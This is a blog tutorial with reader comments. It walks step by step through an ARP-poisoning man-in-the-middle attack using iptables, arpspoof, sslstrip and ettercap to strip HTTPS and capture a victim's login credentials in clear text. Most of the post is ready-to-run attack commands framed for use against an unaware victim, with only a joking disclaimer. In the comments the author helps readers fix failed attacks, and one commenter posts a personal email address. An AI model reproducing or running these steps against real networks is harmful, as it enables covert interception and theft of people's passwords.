Helo, everyone this time I am going to explain how to bypass SSL vpn security using arp-poising and sslstrip.
I am going to use BACKTRACK 5 and ettercap for this tutorial………..
I am going to use BACKTRACK 5 and ettercap for this tutorial………..
I am going to explain this attack step by step
I have uploaded images in high resolution if you can’t see the image click on it and zoom it to see…
This type of attack is done for a specific victim and have an drawback, but still have more than 80% success rate. When we type gmail.com then your request is sent on port 80 from where it is redirected to port 443 at gmail server. In this attack we will come in the middle and then accept all request at port 80 and then redirect it to port 443.
In this attack we are going to do MAN IN THE MIDDLE ATTACK.
In attack is also known as ARP POISONING ATTACK.
To do this attack follow the following steps.........
Note:- backtrack is case sensitive so use the correct case.
Before going to start attack make sure your networking on your system is running to do that use
service networking start
Before going to start attack make sure your networking on your system is running to do that use
service networking start
Step 1:- Flip your machine in forwarding mode.
echo 1 > /proc/sys/net/ipv4/ip_forward
once your machine is in forwarding mode It will be able to accept and forward that request to desired location.
step 2:- Setup ip table to intercept HTTP request:-
iptables -t nat –A PREROUTING –p tcp --destination-port 80 –j REDIRECT --to-port 1000
In this step we are configuring our machine to accept request of port 80 and forward it to port 1000.
step 3:- Check your network or sebnet using ifconfig command
In this example my network is 192.168.56.0/24
If you are using windows for this attack then use ipconfig command to check your network.
step 4:- find out IP of Target PC and Router using nmap.
nmap –sP 192.168.56.0/24
nmap is a scanner utility you can use any other if you want i prefer nmap......
generally xx.xx.xx.1 is your router's IP address.
step 5:- Run arpspoof to convince a network it should send their network traffic to your machine:
arpspoof –i eth0 –t Target’s IP Router’s IP
now your attack has started don't stop it or close this terminal.
step 6:- start sslstrip from “backtrack à Exploitation Tools à web Exploitation à sslstrip”
a new terminal will start don't close previous one....
give the following command in the new terminal.
python sslstrip.py –l 1000
this command will send all traffic from source port 1000 to destination port 443(ssl port)
don't close this terminal start another terminal and follow the remaining steps
now attack is done.
step 7:- start any sniffer and capture all data.
I prefer ettercap so I will start ettercap
ettercap -Tq -i eth0
where eth0 is my interface name you can see it using ifconfig.
now sit and watch all the activity victim is doing
How does it work?
when user will type www.facebook.com
it will send the request to attacker on port 80 where attacker will forward it to facebook.com on port 443 and then we will receive reply from the facebook and will create a ssl tunnel with facebook but point to be noted is it is attacker who is creating ssl tunnel with facebook not the victim.
in simple work for the victim attacker is the www.facebook.com and for the facebook.com attacker is the user who is logging in.
int the victim PC
when the victim press enter or click on login then all data are sent to attacker in clear text form...
sorry for that but I can't show my pass and username everything will be in the clear text.
Most importantly victim have no Idea that he has been hacked because in the victim's PC everything is going well
I try to make it as simple as I can, but if you still have any problem or any type of doubt you can ask????
I have uploaded and video also for reference:
This is for education purpose only.....Don't use it for bad purpose. sorry for that but you know I have to cover my ass....LOL
12 comments:
Hello, really nice post i just have couple of questions. If you can give me an e-mail so we can chat a bit :)
periwalaakar26@gmail.com................
Sslstrip does not work anymore right? I read that https sites found a way to secure port 443 from being forwared to 8080 or 80
Who say it doesn't work any more it work fine if you ask me.....
Well it work if the victim enter http:// instead of https://
if you type www.website.com then it will send you to port 80 by default so it will work until unless you enter https:// manually.....
can you explain why this error has occured in ettercap?
SEND L3 ERROR: 1112 byte packet (0800:06) destined to 69.171.246.16 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Network is unreachable)
)
SEND L3 ERROR: 52 byte packet (0800:06) destined to 69.171.246.16 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Network is unreachable)
)
SEND L3 ERROR: 1112 byte packet (0800:06) destined to 69.171.246.16 was not forwarded (libnet_write_raw_ipv4
Hey zeeshaan zakariya can you specify at which step you are getting this error.
I am not sure but it seams you are using public ip address for arp poisoning, well it may not work in WAN properly because once your request reaches the router your attack stop there because router can only forward ip based request not mac based request.
hey buddy,,ive follow the steps in your video , but seems it did not work for me,, ahmm, i have some question buddy. please help me in this, thank you,, at the last step when i sniff,, no password popups, instead, it always says
DHCP: [18:A9:05:E2:54:F3] DISCOVER
DHCP: [192.168.1.253] OFFER : 192.168.1.102 255.255.255.0 GW 192.168.1.253 DNS 203.115. blah blah
DHCP: [18:A9:05:E2:54:F3] DISCOVER
It look like you have and DHCP server enable in your network. DHCP server is trying to allocate you an IP address. you should have a Static IP address, because static IP address make it easier to attack.
Your output won't effect your attack. Whenever the victim will try to open any website. It will be redirected to your PC and you will get all the credential.
thank you for the quick response buddy,, :D i know a little bit how dhcp work,,
it seems that my router support dhcp server and it was enable,, ahm so do i have to disable the dhcp server in my router?? :) by the way im the one who is responsible for the network infrastruture in our company,, im the network admin, so i can disable it if i want .. hehehe :) thank you again for the quick response.
As I have already mention that DHCP server won't effect your attack.
this type of attack is launched against single victim so, whoever is your victim must open a website which work on https, whenever he/she enter name of the site by default it goes to http and then it get converted into https(sometimes cookies or cache stored in PC directly send it to https, in this case your attack won't work).
You mean buddy that i have to be static?? hehe sorry for being noob
boss,, im now in static ip addres and my victim which is my partner is also in static ipaddress.. but the dhcp still enable.. see the attach file pic , this is my result when i start sniffing. thanks
Post a Comment